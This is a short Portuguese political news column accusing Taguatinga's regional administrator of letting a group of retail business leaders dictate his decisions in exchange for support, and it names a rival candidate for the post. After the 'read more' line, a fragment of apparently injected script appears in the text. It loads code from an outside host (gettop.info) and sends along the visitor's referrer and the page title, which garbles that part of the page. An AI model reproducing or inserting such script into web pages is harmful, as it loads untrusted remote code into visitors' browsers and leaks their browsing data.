Administrador terceiriza gestão em Taguatinga

Ricardo Lustosa tem o apoio de parte dos empresários da região. Foto: Tony Winston/Agência Brasília

Os defensores do projeto de terceirização de mão de obra precisam conhecer o modelo que vem sendo implantado em Taguatinga. Afilhado político da desgastada deputada distrital Sandra Faraj (SD), o administrador regional Ricardo Lustosa aliou-se a um grupo de empresários para tentar se manter no cargo. Na prática, terceirizou sua gestão.

Toma lá, dá cá

Tendo à frente diretores do Sindivarejista, inclusive o presidente Edson de Castro, os empresários apresentam suas demandas e o administrador apressa-se em atendê-las. Ou seja, Lustosa só executa aquilo que o grupo quer. Em troca, a turma manda recados para o Buriti dizendo-se satisfeita com seu trabalho.

Sucessor

Mas a estratégia não é unânime. O primeiro a se opor é o presidente da Associação Comercial e Industrial de Taguatinga (Acit), Justo Magalhães, credenciado a ocupar a cadeira de Lustosa. Teria as bênçãos de pelo menos três aliados de Rollemberg: os distritais Chico Leite (Rede), Reginaldo Veras (PDT), Rafael Prudente (PMDB).

Leia mais sobre Política do DFs.src=’http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

Deixe um comentário